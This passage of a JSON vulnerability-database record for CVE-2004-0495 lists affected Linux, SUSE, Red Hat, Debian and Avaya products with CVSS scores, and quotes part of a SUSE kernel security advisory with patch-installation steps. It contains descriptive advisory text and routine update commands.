        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.1"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "modular messaging message storage server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "s3400"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "linux connectivity server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.2"
      },
      {
        "model": "office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "intuity audix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.0"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "iii"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "7"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.1"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "secure enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "suse email server iii",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "suse email server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "3.1"
      },
      {
        "model": "office server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.1"
      },
      {
        "model": "linux personal x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.2"
      },
      {
        "model": "linux office server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux firewall on cd",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "linux connectivity server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "advanced workstation for the itanium processor ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "s8700 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8700 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s3400 message application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "intuity lx",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:avaya:converged_communications_server:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:avaya:modular_messaging_message_storage_server:s3400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:7:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:advanced_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:advanced_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:avaya:intuity_audix:*:*:lx:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_admin-cd_for_firewall:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_connectivity_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_database_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_firewall_cd:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:iii:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Alexander Viro",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0495",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2004-0495",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-8925",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0495",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200408-045",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8925",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple unknown vulnerabilities in Linux kernel 2.4 and 2.6 allow local users to gain privileges or access kernel memory, as found by the Sparse source code checking tool. The Linux kernel is reported prone to multiple device-driver issues. These issues were found during a recent audit of the Linux kernel source. Local attackers can exploit these vulnerabilities to elevate privileges or conduct denial-of-service attacks on the system. The affected device drivers are: aironet, asus_acpi, decnet, mpu401, msnd, and pss. -----BEGIN PGP SIGNED MESSAGE-----\n\n______________________________________________________________________________\n\n                        SUSE Security Announcement\n\n        Package:                kernel\n        Announcement-ID:        SUSE-SA:2004:020\n        Date:                   Tuesday, Jul 2nd 2004 18:00 MEST\n        Affected products:      8.0, 8.1, 8.2, 9.0, 9.1\n                                SUSE Linux Database Server,\n                                SUSE eMail Server III, 3.1\n                                SUSE Linux Enterprise Server 7, 8\n                                SUSE Linux Firewall on CD/Admin host\n                                SUSE Linux Connectivity Server\n                                SUSE Linux Office Server\n        Vulnerability Type:     local privilege escalation\n        Severity (1-10):        6\n        SUSE default package:   yes\n        Cross References:\tCAN-2004-0495\n\t\t\t\tCAN-2004-0496\n\t\t\t\tCAN-2004-0497\n\t\t\t\tCAN-2004-0535\n\t\t\t\tCAN-2004-0626\n\n\n    Content of this advisory:\n        1) security vulnerability resolved:\n\t\t- chown: users can change the group affiliation of arbitrary\n\t\t  files to the group they belong to\n\t\t- missing DAC check in chown(2): local privilege escalation\n\t        - overflow with signals: local denial-of-service\n        \t- pss, mpu401 sound driver: read/write to complete memory\n\t        - airo driver: read/write to complete memory\n        \t- ALSA: copy_from_user/copy_to_user confused\n        \t- acpi_asus: read from random memory\n        \t- decnet: write to memory without checking\n        \t- e1000 driver: read complete memory\n           problem description, discussion, solution and upgrade information\n        2) pending vulnerabilities, solutions, workarounds:\n\t\t- icecast\n                - sitecopy\n                - cadaver\n                - OpenOffice_org\n                - tripwire\n                - postgresql*\n                - mod_proxy\n\t\t- freeswan\n\t\t- ipsec-tools\n\t\t- less\n\t\t- libpng\n\t\t- pavuk\n\t\t- XFree86*\n\t\t- kdebase3\n        3) standard appendix (further information)\n\n______________________________________________________________________________\n\n1)  problem description, brief discussion, solution, upgrade information\n\n    Multiple security vulnerabilities are being addressed with this security\n    update of the Linux kernel. \n\n    Kernel memory access vulnerabilities are fixed in the e1000, decnet, \n    acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These \n    vulnerabilities can lead to kernel memory read access, write access \n    and local denial of service conditions, resulting in access to the \n    root account for an attacker with a local account on the affected \n    system. \n\n    Missing Discretionary Access Control (DAC) checks in the chown(2) system\n    call allow an attacker with a local account to change the group\n    ownership of arbitrary files, which leads to root privileges on affected\n    systems. An interesting variant of the missing \n    checks is that the ownership of files in the /proc filesystem can be \n    altered, while the changed ownership still does not allow the files to \n    be accessed as a non-root user for to be able to exploit the \n    vulnerability. Systems that are based on a version 2.4 kernel are not \n    vulnerable to the /proc weakness, and exploitation of the weakness \n    requires the use of the kernel NFS server (knfsd). If the knfsd NFS \n    server is not activated (it is off by default), the vulnerability is \n    not exposed. \n\n    The only network-related vulnerability fixed with the kernel updates\n    that are subject to this announcement affect the SUSE Linux 9.1 \n    distribution only, as it is based on a 2.6 kernel. Found and reported \n    to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability \n    allows a remote attacker to send a specially crafted TCP packet to a \n    vulnerable system, causing that system to stall if it makes use of \n    TCP option matching netfilter rules. \n\n    In some rare configurations of the SUSE Linux 9.1 distribution, some \n    users have experienced stalling systems during system startup. These \n    problems are fixed with this kernel update. \n\n\n\n    SPECIAL INSTALL INSTRUCTIONS:\n    ==============================\n    For the impatient: Run YOU (Yast2 Online Update, command \n    \"yast2 online_update\" as root) to install the updates (semi) \n    automatically, if you have a SUSE Linux 8.1 and newer system. \n\n    For those who wish to install their kernel updates manually and for \n    those who use a SUSE Linux 8.0 system:\n\n    The following paragraphs will guide you through the installation\n    process in a step-by-step fashion. The character sequence \"****\"\n    marks the beginning of a new paragraph. In some cases, the steps\n    outlined in a particular paragraph may or may not be applicable\n    to your situation. \n    Therefore, please make sure to read through all of the steps below\n    before attempting any of these procedures. \n    All of the commands that need to be executed are required to be\n    run as the superuser (root). Each step relies on the steps before\n    it to complete successfully. \n\n\n  **** Step 1: Determine the needed kernel type\n\n    Please use the following command to find the kernel type that is\n    installed on your system:\n\n      rpm -qf /boot/vmlinuz\n\n    Following are the possible kernel types (disregard the version and\n    build number following the name separated by the \"-\" character)\n\n      k_deflt   # default kernel, good for most systems. \n      k_i386    # kernel for older processors and chipsets\n      k_athlon  # kernel made specifically for AMD Athlon(tm) family processors\n      k_psmp    # kernel for Pentium-I dual processor systems\n      k_smp     # kernel for SMP systems (Pentium-II and above)\n      k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM\n      kernel-64k-pagesize\n      kernel-bigsmp\n      kernel-default\n      kernel-smp\n\n  **** Step 2: Download the package for your system\n\n    Please download the kernel RPM package for your distribution with the\n    name as indicated by Step 1. The list of all kernel rpm packages is\n    appended below. Note: The kernel-source package does not\n    contain a binary kernel in bootable form. Instead, it contains the\n    sources that the binary kernel rpm packages are created from. It can be\n    used by administrators who have decided to build their own kernel. \n    Since the kernel-source.rpm is an installable (compiled) package that\n    contains sources for the linux kernel, it is not the source RPM for\n    the kernel RPM binary packages. \n\n    The kernel RPM binary packages for the distributions can be found at the\n    locations below ftp://ftp.suse.com/pub/suse/i386/update/. \n\n      8.0/images/\n      8.1/rpm/i586\n      8.2/rpm/i586\n      9.0/rpm/i586\n      9.1/rpm/i586\n\n    After downloading the kernel RPM package for your system, you should\n    verify the authenticity of the kernel rpm package using the methods as\n    listed in section 3) of each SUSE Security Announcement. \n\n\n  **** Step 3: Installing your kernel rpm package\n\n    Install the rpm package that you have downloaded in Steps 3 or 4 with\n    the command\n        rpm -Uhv --nodeps --force \u003cK_FILE.RPM\u003e\n    where \u003cK_FILE.RPM\u003e is the name of the rpm package that you downloaded. \n\n    Warning: After performing this step, your system will likely not be\n             able to boot if the following steps have not been fully\n             followed. \n\n\n    If you run SUSE LINUX 8.1 and haven\u0027t applied the kernel update\n    (SUSE-SA:2003:034), AND you are using the freeswan package, you also\n    need to update the freeswan rpm as a dependency as offered\n    by YOU (YaST Online Update). The package can be downloaded from\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/\n\n  **** Step 4: configuring and creating the initrd\n\n    The initrd is a ramdisk that is loaded into the memory of your\n    system together with the kernel boot image by the bootloader. The\n    kernel uses the content of this ramdisk to execute commands that must\n    be run before the kernel can mount its actual root filesystem. It 